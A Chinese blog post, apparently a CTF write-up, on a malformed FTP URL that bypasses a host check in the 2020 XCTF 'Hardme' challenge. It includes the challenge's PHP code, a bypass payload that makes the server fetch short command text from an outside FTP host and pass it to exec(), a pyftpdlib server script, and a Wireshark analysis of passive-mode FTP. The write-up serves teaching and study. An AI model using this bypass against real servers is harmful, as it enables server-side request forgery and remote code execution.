<!DOCTYPE html>
<html lang="en">

<!-- Head tag (contains Google-Analytics、Baidu-Tongji)-->
<head>
  <!-- Google Analytics -->
  
    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async="async" src="https://www.googletagmanager.com/gtag/js?id=UA-xxxxxx-xx"></script>
    <script type="text/javascript">
      window.dataLayer = window.dataLayer || [];

      function gtag() {
        dataLayer.push(arguments);
      }
      gtag('js', new Date());

      gtag('config', 'UA-xxxxxx-xx');
    </script>
  

  <!-- Baidu Tongji -->
  
    <script type="text/javascript">
      // Originial
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
  

  <!-- Baidu Push -->
  
    <script>
      (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
          bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
          bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
      })();
    </script>
  

  <meta charset="utf-8"/>
  <meta http-equiv="X-UA-Compatible" content="IE=edge"/>

  <meta name="google-site-verification" content="lxDfCplOZbIzjhG34NuQBgu2gdyRlAtMB4utP5AgEBc"/>
  <meta name="baidu-site-verification" content="PpzM9WxOJU"/>

  <meta name="viewport" content="width=device-width, initial-scale=1"/>
  <meta name="description" content="Morouu的大狗窝 ●&#39;◡&#39;●"/>
  <meta name="keyword" content="Morouu,morouu"/>
  <link rel="shortcut icon" href="/img/avatar/mdx.png"/>

  <!-- Place this tag in your head or just before your close body tag. -->
  <script async="async" defer="defer" src="https://buttons.github.io/buttons.js"></script>

  
    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="/css/bootstrap.min.css"/>

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/beantech.min.css"/>

    <!-- Pygments Highlight CSS -->
    <link rel="stylesheet" href="/css/highlight.css"/>
    <link rel="stylesheet" href="/css/widget.css"/>
    <link rel="stylesheet" href="/css/rocket.css"/>
    <link rel="stylesheet" href="/css/signature.css"/>
    <link rel="stylesheet" href="/css/catalog.css"/>
    <link rel="stylesheet" href="/css/livemylife.css"/>

    
      <!-- wave start -->
      <link rel="stylesheet" href="/css/wave.css"/>
      <!-- wave end -->
    

    
      <!-- top start (article top hot config) -->
      <link rel="stylesheet" href="/css/top.css"/>
      <!-- top end -->
    

    
      <!-- ThemeColor start -->
      <link rel="stylesheet" href="/css/scroll.css"/>
      <!-- ThemeColor end -->
    

    
      <!-- viewer start (Picture preview) -->
      <link rel="stylesheet" href="/css/viewer.min.css"/>
      <!-- viewer end -->
    

    
      <!-- Search start -->
      <link rel="stylesheet" href="/css/search.css"/>
      <!-- Search end -->
    

    
      <!-- ThemeColor start -->
      <link rel="stylesheet" href="/css/themecolor.css"/>
      <!-- ThemeColor end -->
    

    

    
      <!-- gitalk start -->
      <!-- <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css"> -->
      <link rel="stylesheet" href="/css/gitalk.css"/>
      <!-- gitalk end -->
    
  

  <!-- Custom Fonts -->
  <!-- <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"> -->
  <!-- Hux change font-awesome CDN to qiniu -->
  <link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/4.5.0/css/font-awesome.min.css" type="text/css">
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">

  <!-- Hux Delete, sad but pending in China <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link
  href='http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/ css'> -->

  <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
  <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
  <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]-->

  <!-- ga & ba script hoook -->
  <link rel="canonical" href="https://morblog.cc/2021/12/27/cn/非预期 - 畸形ftp请求/">
  <title>
    
      非预期 - 畸形ftp请求 - Morouu的大狗窝 ●&#39;◡&#39;●
    
  </title>
<meta name="generator" content="Hexo 5.4.0"></head>


<!-- hack iOS CSS :active style -->

	<body ontouchstart="" class="body--light body--light">


		<!-- ThemeColor -->
		
		<!-- ThemeColor -->
<style type="text/css">
  .body--light {
    --light-mode: none;
    --dark-mode: block;
  }
  .body--dark {
    --light-mode: block;
    --dark-mode: none;
  }
  i.mdui-icon.material-icons.light-mode {
    display: var(--light-mode);
  }
  i.mdui-icon.material-icons.dark-mode {
    display: var(--dark-mode);
  }
</style>
<div class="toggle" onclick="document.body.classList.toggle('body--dark')">
  <i class="mdui-icon material-icons light-mode"></i>
  <i class="mdui-icon material-icons dark-mode"></i>
</div>
<script>
  //getCookieValue
  function getCookieValue(a) {
    var b = document.cookie.match('(^|[^;]+)\\s*' + a + '\\s*=\\s*([^;]+)');
    return b
      ? b.pop()
      : '';
  }
  let themeMode = 'light';
  if (getCookieValue('sb-color-mode') && (getCookieValue('sb-color-mode') !== themeMode)) {
    let dbody = document.body.classList;
    themeMode === 'dark' ? dbody.remove('body--dark') : dbody.add('body--dark');
  }

  //setCookieValue
  var toggleBtn = document.querySelector(".toggle");
  toggleBtn.addEventListener("click", function () {
    var e = document.body.classList.contains("body--dark");
    var cookieString = e
      ? "dark"
      : "light";
    var exp = new Date();
    exp.setTime(exp.getTime() + 3 * 24 * 60 * 60 * 1000); //3天过期
    document.cookie = "sb-color-mode=" + cookieString + ";expires=" + exp.toGMTString() + ";path=/";
  });
</script>

		

		<!-- Gitter -->
		
		<!-- Gitter -->
<!-- Docs:https://gitter.im/?utm_source=left-menu-logo -->
<script>
  ((window.gitter = {}).chat = {}).options = {
    room: 'dmantick/morcruiser'
  };
</script>
<script src="https://sidecar.gitter.im/dist/sidecar.v1.js" async defer></script>

		

		<!-- Navigation (contains search)-->
		<!-- Navigation -->
<nav class="navbar navbar-default navbar-custom navbar-fixed-top">
  <div class="container-fluid">
    <!-- Brand and toggle get grouped for better mobile display -->
    <div class="navbar-header page-scroll">
      <button type="button" class="navbar-toggle">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="/">Morouu的大狗窝 ●&#39;◡&#39;●</a>
    </div>

    <!-- Collect the nav links, forms, and other content for toggling -->
    <!-- Known Issue, found by Hux: <nav>'s height woule be hold on by its content. so, when navbar scale out, the <nav> will cover tags. also mask any touch event of tags, unfortunately. -->
    <div id="huxblog_navbar">
      <div class="navbar-collapse">
        <ul class="nav navbar-nav navbar-right">
          <li>
            <a href="/">首页</a>
          </li>

          
          
          <li>
            <a href="/about/">
              
              关于
              
              
            </a>
          </li>
          
          
          
          
          
          <li>
            <a href="/archive/">
              
              归档
              
              
            </a>
          </li>
          
          
          
          <li>
            <a href="/categories/">
              
              分类
              
              
            </a>
          </li>
          
          
          
          <li>
            <a href="/tags/">
              
              标签
              
              
            </a>
          </li>
          
          

          
          <li>
            <a class="popup-trigger">
              <span class="search-icon"></span>搜索</a>
          </li>
          

          <!-- LangSelect -->
          
          
          
          
          
        </ul>
      </div>
    </div>
    <!-- /.navbar-collapse -->
  </div>
  <!-- /.container -->
</nav>
<!-- progress -->
<div id="progress">
  <div class="line" style="width: 0%;"></div>
</div>

<script>
  // Drop Bootstarp low-performance Navbar Use customize navbar with high-quality material design animation in high-perf jank-free CSS3 implementation
  var $body = document.body;
  var $toggle = document.querySelector('.navbar-toggle');
  var $navbar = document.querySelector('#huxblog_navbar');
  var $collapse = document.querySelector('.navbar-collapse');

  $toggle.addEventListener('click', handleMagic)

  function handleMagic(e) {
    if ($navbar.className.indexOf('in') > 0) {
      // CLOSE
      $navbar.className = " ";
      // wait until animation end.
      setTimeout(function() {
        // prevent frequently toggle
        if ($navbar.className.indexOf('in') < 0) {
          $collapse.style.height = "0px"
        }
      }, 400)
    } else {
      // OPEN
      $collapse.style.height = "auto"
      $navbar.className += " in";
    }
  }
</script>


		<!-- Post Header (contains intro-header、signature、wordcount、busuanzi、waveoverlay) -->
		<!-- Modified by Yu-Hsuan Yen -->
<!-- Post Header -->

  <style type="text/css">
    .body--light {
      /* intro-header */
      --intro-header-background-image-url-home: url('/img/header_img/bgtop.jpg');
      --intro-header-background-image-url-post: url('https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/20210321213459.png?x-oss-process=image/auto-orient,1/interlace,1/resize,m_fixed,w_1920,h_1080');
      --intro-header-background-image-url-page: url('/https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/20210321213459.png?x-oss-process=image/auto-orient,1/interlace,1/resize,m_fixed,w_1920,h_1080');
    }
    .body--dark {
      --intro-header-background-image-url-home: linear-gradient(rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0.2)), url('/img/header_img/bgtop.jpg');
      --intro-header-background-image-url-post: linear-gradient(rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0.2)), url('https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/20210321213459.png?x-oss-process=image/auto-orient,1/interlace,1/resize,m_fixed,w_1920,h_1080');
      --intro-header-background-image-url-page: linear-gradient(rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0.2)), url('/https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/20210321213459.png?x-oss-process=image/auto-orient,1/interlace,1/resize,m_fixed,w_1920,h_1080');
    }

    header.intro-header {
       /*post*/
        background-image: var(--intro-header-background-image-url-post);
        /* background-image: url('https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/20210321213459.png?x-oss-process=image/auto-orient,1/interlace,1/resize,m_fixed,w_1920,h_1080'); */
      
    }

    
      #signature {/*signature*/
        background-image: url('/img/signature/morouu2.png');
      }
    
  </style>





<header class="intro-header">
  <!-- Signature -->
  <div id="signature">
    <div class="container">
      <div class="row">
        <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
          
          <div class="post-heading">
            <div class="tags">
              
              <a class="tag" href="/tags/#安全" title="安全">安全</a>
              
              <a class="tag" href="/tags/#WEB" title="WEB">WEB</a>
              
              <a class="tag" href="/tags/#ctf" title="ctf">ctf</a>
              
              <a class="tag" href="/tags/#trick" title="trick">trick</a>
              
            </div>
            <h1>非预期 - 畸形ftp请求</h1>
            <h2 class="subheading"></h2>
            <span class="meta">
              Posted by morouu on
              2021-12-27
            </span>


            
            <!-- WordCount start -->
            <div class="blank_box"></div>
            <span class="meta">
              Estimated Reading Time <span class="post-count" >15</span> Minutes
            </span>
            <div class="blank_box"></div>
            <span class="meta">
              Words <span class="post-count">3.6k</span> In Total
            </span>
            <div class="blank_box"></div>
            <!-- WordCount end -->
            
            
            <!-- 不蒜子统计 start -->
            <span class="meta" id="busuanzi_container_page_pv">
              Viewed <span id="busuanzi_value_page_pv"><i class="fa fa-spinner fa-spin"></i></span> Times
            </span>
            <!-- 不蒜子统计 end -->
            


          </div>
          
        </div>
      </div>
    </div>
  </div>

  
  <!-- waveoverlay start -->
  <div class="preview-overlay">
    <svg class="preview-waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
      <defs>
        <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path>
      </defs>
      <g class="preview-parallax">
        <use xlink:href="#gentle-wave" x="48" y="0" fill=var(--gentle-wave1)></use>
        <use xlink:href="#gentle-wave" x="48" y="3" fill=var(--gentle-wave2)></use>
        <use xlink:href="#gentle-wave" x="48" y="5" fill=var(--gentle-wave3)></use>
        <use xlink:href="#gentle-wave" x="48" y="7" fill=var(--gentle-wave)></use>
      </g>
    </svg>
  </div>
  <!-- waveoverlay end -->
  

</header>



		<!-- Main Content (Post contains
	Pager、
	tip、
	socialshare、
	gitalk、gitment、disqus-comment、
	Catalog、
	Sidebar、
	Featured-Tags、
	Friends Blog、
	anchorjs、
	) -->
		<!-- Modify by Yu-Hsuan Yen -->
<!-- Post Content -->
<article>
  <div class="container" style="margin-left: 10%;">
    <div class="row">
      <!-- Post Container -->
      <div class="col-lg-10 col-lg-offset-1 col-md-10 col-md-offset-1 post-container">

        <h1 id="非预期-畸形ftp请求"><a href="#非预期-畸形ftp请求" class="headerlink" title="非预期 - 畸形ftp请求"></a>非预期 - 畸形ftp请求</h1><hr>
<h2 id="前言"><a href="#前言" class="headerlink" title="- 前言 -"></a>- 前言 -</h2><p>出自 <strong>2020年XCTF高校战疫</strong> 中的 <strong>Hardme非预期</strong> ，还挺有意思的。</p>
<hr>
<h2 id="正文"><a href="#正文" class="headerlink" title="- 正文 -"></a>- 正文 -</h2><h3 id="原题"><a href="#原题" class="headerlink" title="- 原题 -"></a>- 原题 -</h3><p>看关键的 <strong>第二关</strong> 源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$url</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;url&#x27;</span>];</span><br><span class="line">      <span class="keyword">if</span> (filter_var(<span class="variable">$url</span>, FILTER_VALIDATE_URL)) &#123;</span><br><span class="line">          <span class="keyword">if</span> (preg_match(<span class="string">&#x27;/(data:\/\/)|(&amp;)|(\|)|(\.\/)/i&#x27;</span>, <span class="variable">$url</span>)) &#123;</span><br><span class="line">              <span class="keyword">echo</span> <span class="string">&quot;you are hacker&quot;</span>;</span><br><span class="line">          &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">              <span class="variable">$res</span> = parse_url(<span class="variable">$url</span>);</span><br><span class="line">              <span class="keyword">if</span> (preg_match(<span class="string">&#x27;/127\.0\.0\.1$/&#x27;</span>, <span class="variable">$res</span>[<span class="string">&#x27;host&#x27;</span>])) &#123;</span><br><span class="line">                  <span class="variable">$code</span> = file_get_contents(<span class="variable">$url</span>);</span><br><span class="line">                  <span class="keyword">if</span> (strlen(<span class="variable">$code</span>) &lt;= <span class="number">4</span>) &#123;</span><br><span class="line">                      @exec(<span class="variable">$code</span>);</span><br><span class="line">                  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                      <span class="keyword">echo</span> <span class="string">&quot;try again&quot;</span>;</span><br><span class="line">                  &#125;</span><br><span class="line">              &#125;</span><br><span class="line">          &#125;</span><br><span class="line">      &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">          <span class="keyword">echo</span> <span class="string">&quot;invalid url&quot;</span>;</span><br><span class="line">      &#125;</span><br></pre></td></tr></table></figure>
<p>直接看第三层bypass：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$res</span> = parse_url(<span class="variable">$url</span>);</span><br><span class="line"> <span class="keyword">if</span> (preg_match(<span class="string">&#x27;/127\.0\.0\.1$/&#x27;</span>, <span class="variable">$res</span>[<span class="string">&#x27;host&#x27;</span>])) &#123;</span><br><span class="line">     <span class="comment">#OK</span></span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure>
<p>直接上payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url=ftp://xxx.xxx.xxx.xxx:[port],<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">80</span>/filename</span><br></pre></td></tr></table></figure>
<p>虽说这样确实是可以利用 <strong>ftp</strong> 出外网，但具体的请求方式和普通的 <strong>ftp</strong> 请求是很不一样的。</p>
<h3 id="分析"><a href="#分析" class="headerlink" title="- 分析 -"></a>- 分析 -</h3><p>不妨对形如 <code>ftp://xxx.xxx.xxx.xxx[port],127.0.0.1:80/filename</code> 的 <strong>ftp</strong> 请求做一个分析。先用 <strong>python</strong> 写一个简单的 <strong>ftp</strong> 服务器：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pyftpdlib.authorizers</span><br><span class="line"><span class="keyword">import</span> pyftpdlib.handlers</span><br><span class="line"><span class="keyword">import</span> pyftpdlib.servers</span><br><span class="line"></span><br><span class="line"><span class="comment"># ftp 服务端 IP 以及 端口</span></span><br><span class="line">connect_ip=<span class="string">&#x27;172.17.48.108&#x27;</span></span><br><span class="line">connect_port=<span class="number">6600</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 设置上传和下载的最大速度</span></span><br><span class="line">max_speed_upload=<span class="number">1024</span> * <span class="number">1024</span></span><br><span class="line">max_speed_download=<span class="number">1024</span> * <span class="number">1024</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 设置总最大连接数以及每个IP同一时间最大连接数</span></span><br><span class="line">max_connect = <span class="number">10</span></span><br><span class="line">max_count_ip = <span class="number">2</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 设置被动模式下分配的端口范围</span></span><br><span class="line">passive_port=(<span class="number">6601</span>,<span class="number">6700</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 初始化用户组以及两个用户，这两个用户的权限仅为&#x27;可读&#x27;</span></span><br><span class="line">user_group=pyftpdlib.authorizers.DummyAuthorizer()</span><br><span class="line">user_group.add_user(username = <span class="string">&quot;DQ&quot;</span>,password = <span class="string">&quot;123&quot;</span>,homedir = <span class="string">&quot;C:/ftpfiles/&quot;</span>,perm = <span class="string">&quot;elr&quot;</span>)</span><br><span class="line">user_group.add_anonymous(homedir = <span class="string">&quot;C:/ftpfiles/&quot;</span>,perm = <span class="string">&quot;elr&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 初始化各个数值</span></span><br><span class="line">dtp_h=pyftpdlib.handlers.ThrottledDTPHandler</span><br><span class="line">ftp_h=pyftpdlib.handlers.FTPHandler</span><br><span class="line"></span><br><span class="line">dtp_h.read_limit=max_speed_download</span><br><span class="line">dtp_h.write_limit=max_speed_upload</span><br><span class="line"></span><br><span class="line">ftp_h.authorizer=user_group</span><br><span class="line">ftp_h.passive_ports=<span class="built_in">range</span>(passive_port[<span class="number">0</span>],passive_port[<span class="number">1</span>])</span><br><span class="line">ftp_h.banner=<span class="string">&quot;hello,world!&quot;</span></span><br><span class="line"></span><br><span class="line">server = pyftpdlib.servers.FTPServer((connect_ip,connect_port),ftp_h)</span><br><span class="line">server.max_cons=max_connect</span><br><span class="line">server.max_cons_per_ip=max_count_ip</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    <span class="comment"># 启动ftp</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;Start ftp:&quot;</span>,(connect_ip,connect_port))</span><br><span class="line">    server.serve_forever()</span><br></pre></td></tr></table></figure>
<p>然后使用 <strong>wireshark</strong> 进行简单的流程跟踪 <strong>ftp</strong> 被动模式。</p>
<ul>
<li><p>首先，这是一个简单的客户端向服务端请求ftp服务，客户端与服务端先进行第一次握手连接，在确认连接后，服务端向客户端发送欢迎信息，同时表示服务已准备就绪（220）：</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271942734.png" alt="image-20200310214533608.png"></p>
</li>
<li><p>当客户端收到服务就绪信息时（220），客户端会先向服务端发送用户名：</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271942082.png" alt="image-20200310221349620.png"></p>
</li>
<li><p>服务端收到信息后会向客户端发回需要密码的信息并等待客户端提供密码（331），（在ftp中匿名登录实际上是用用户名为 <strong>‘anonymous’</strong> 的用户进行登录，和普通用户登录基本没区别；若服务端上没有名为 <strong>‘anonymous’</strong> 的用户，则无法进行匿名登录；若 <strong>‘anonymous’</strong> 用户设置了密码，则在匿名登录的时候也需要输入密码）:</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271942065.png" alt="image-20200310221429844.png"></p>
</li>
<li><p>客户端收到服务端发来的密码要求后，发送密码，若密码正确则服务端会返回登录成功（230），若不正确则会返回用户认证失败（530）；</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271942684.png" alt="image-20200310221532895.png"></p>
</li>
<li><p>之后客户端会询问当前ftp系统信息，服务端会回复给客户端（215）；</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271942753.png" alt="image-20200310221559997.png"></p>
</li>
<li><p>客户端向服务端发送 <strong>‘PWD’</strong> ，服务端会将当前 <strong>‘/ ‘</strong>目录名创建（类似初始化ftp的相对路径）当前（257）；</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271942408.png" alt="image-20200310215432241.png"></p>
</li>
<li><p>下一步客户端向服务端发送类型值，比如我这里是 <strong>I</strong> 那就是以二进制模式，发送成功后，服务端会返回命令成功执行（200）；</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271942122.png" alt="image-20200310215730862.png"></p>
</li>
<li><p>开始解析请求的路径，这里我请求的是 <strong>‘ftp://xxx/way/‘</strong> ：</p>
<ul>
<li><p>客户端先向服务端请求 ‘/way’ 文件的大小，服务端检查，NO，这不是一个文件，告诉客户端命令无法识别（500）；</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271942600.png" alt="image-20200310221717543.png"></p>
</li>
<li><p>客户端向服务端请求到 <strong>‘/way/‘</strong> 这个目录中，服务端检查，OK，这是一个目录，将当前目录设置成 ‘/way/‘ 并返回请求文件操作成功（250）；</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271942956.png" alt="image-20200310221759305.png"></p>
</li>
</ul>
</li>
<li><p>客户端向服务端请求PASV（被动模式）：</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943947.png" alt="image-20200310221853324.png"></p>
</li>
<li><p>服务端返回开启passive模式（227），返回内容，同时开启一个6626的端口：</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943486.png" alt="image-20200310222555238.png"></p>
</li>
<li><p>然后客户端会开启另一个端口，并用新开起的端口去和服务端提供的新端口进行第二次握手连接：</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943905.png" alt="image-20200310223354406.png"></p>
</li>
<li><p>客户端请求当前目录下的内容：</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943069.png" alt="image-20200310223629354.png"></p>
</li>
<li><p>服务端向客户端返回数据连接已就绪消息（150）：</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943735.png" alt="image-20200310224524970.png"></p>
</li>
<li><p>客户端使用第二次握手建立的连接，向服务端发送确认信息，服务端将当前目录下的内容返回给客户端；</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943418.png" alt="image-20200310224724648.png"></p>
</li>
<li><p>当信息成功发送后，第二次握手建立连接在服务端向客户端发送完传输完成（226）中逐步进行挥手操作：</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943904.png" alt="image-20200310225730635.png"></p>
</li>
<li><p>第二次握手建立的连接挥手操作完毕后，客户端向服务端发送确认信息，以及退出信息：</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943261.png" alt="image-20200310230052240.png"></p>
</li>
<li><p>服务端接收到客户端发来的退出信息，回应客户端后（221），第一次握手建立的连接进行挥手操作，此时整个ftp的简单请求到此结束:</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943098.png" alt="image-20200310230219915.png"></p>
</li>
<li><p>接着是简单的ftp关于下载文件的请求过程：</p>
<ul>
<li><p>其中，这些步骤和上边的基本都是一样的：</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943838.png" alt="image-20200310230843452.png"></p>
</li>
<li><p>这里就从第二次握手建立的连接后开始，客户端向服务端请求下载 ‘/way/BMV5.txt’ 文件：</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943553.png" alt="image-20200310230954017.png"></p>
</li>
<li><p>服务端告诉客户端，数据传输已准备就绪（150）：</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943236.png" alt="image-20200310231151986.png"></p>
</li>
<li><p>服务端在收到来自客户端的确认信息后，开始用第二次握手建立的连接传输：</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943698.png" alt="image-20200310232626616.png"></p>
</li>
<li><p>假若信息过长的话，会进行分段传输，每当服务端传输完一段后，客户端新开的端口会向服务端发送确认收到的信息，然后实际上服务端向客户端返回的传输完成的信息看起来是并行的，红方框的内容是正则传输的内容：（226）</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943295.png" alt="image-20200310233911883.png"></p>
</li>
</ul>
</li>
</ul>
<ol>
<li>服务端会在最后一段内容中将挥手信息发回客户端，比如上图的最后一个红框即是；</li>
<li>后边就是第二次握手建立的连接先挥手，然后第一次握手建立的连接再挥手了，跟最上边的普通过程基本是没区别的了；</li>
</ol>
<ul>
<li>以上即是正常的ftp请求，现在我要用payload进行请求了，当然如果只是仅仅普通的payload去获取文件是不可行的，因为这个是畸形的请求：</li>
</ul>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url=ftp://xxx.xxx.xxx.xxx:[port],127.0.0.1:80/evil.txt</span><br></pre></td></tr></table></figure>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943260.png" alt="image-20200310235530639.png"></p>
<ul>
<li>上边先是的421错误，展开被动模式（第二次握手连接应该没搞好）超时；</li>
<li>使用 <strong>wireshark</strong> 还原整个 <strong>ftp</strong> 请求，发现，原来是在进行第二次握手连接的时候，客户端新开的端口并没有连入服务端新开的端口上，而是客户端用新开的端口连上了原来的ftp端口了：</li>
</ul>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943664.png" alt="image-20200311000208175.png"></p>
<ul>
<li><p>第一次握手：客户端向服务端请求一个端口，服务端开放随机端口A并告诉客户端；</p>
</li>
<li><p>第二次握手：客户端用新开端口B，并尝试用端口B连接服务端的端口A，然后使用端口B→端口A这条路子传输；</p>
</li>
</ul>
<p>当传输数据结束后，先断开第二次握手建立的连接，再断开第一次握手建立的连接。使用畸形的URL的结果是在第二次握手时客户端新开的端口B没能连接第一次握手时服务端所给的新开的端口A，而是连接了第一次握手时连接的服务端的原来的端口，于是就卡住了。<em>（简单来说，服务端在等待客户端连接自己新开的端口A，而客户端却在用自己新开的端口B去连接第一次握手服务端的的原来的端口）</em></p>
<h3 id="结论"><a href="#结论" class="headerlink" title="- 结论 -"></a>- 结论 -</h3><p>那么至少可以得到一点，这个畸形的 <strong>ftp</strong> 请求，实际上是能够成功进入外网的，并且第一次握手连接是可以完全能正确的，只需要将客户端新开的端口B和服务端新开的端口A连通就行了，并不需要魔改 <strong>ftp</strong> （当时做题的时候差点真的把 <strong>ftp</strong> 给魔改了，真的，就差一点点）。</p>
<p>最简单的方式即是端口转发了，不过由于上述说过 <strong>ftp</strong> 对文件传输发送的完成信息和文件传输实际上是并行的，也就是说服务端会用第一次握手建立的连接发送传输完成的信息，而实际上第二次握手建立的连接仍然在传输信息，并没有真的完成，这就比较麻烦了。</p>
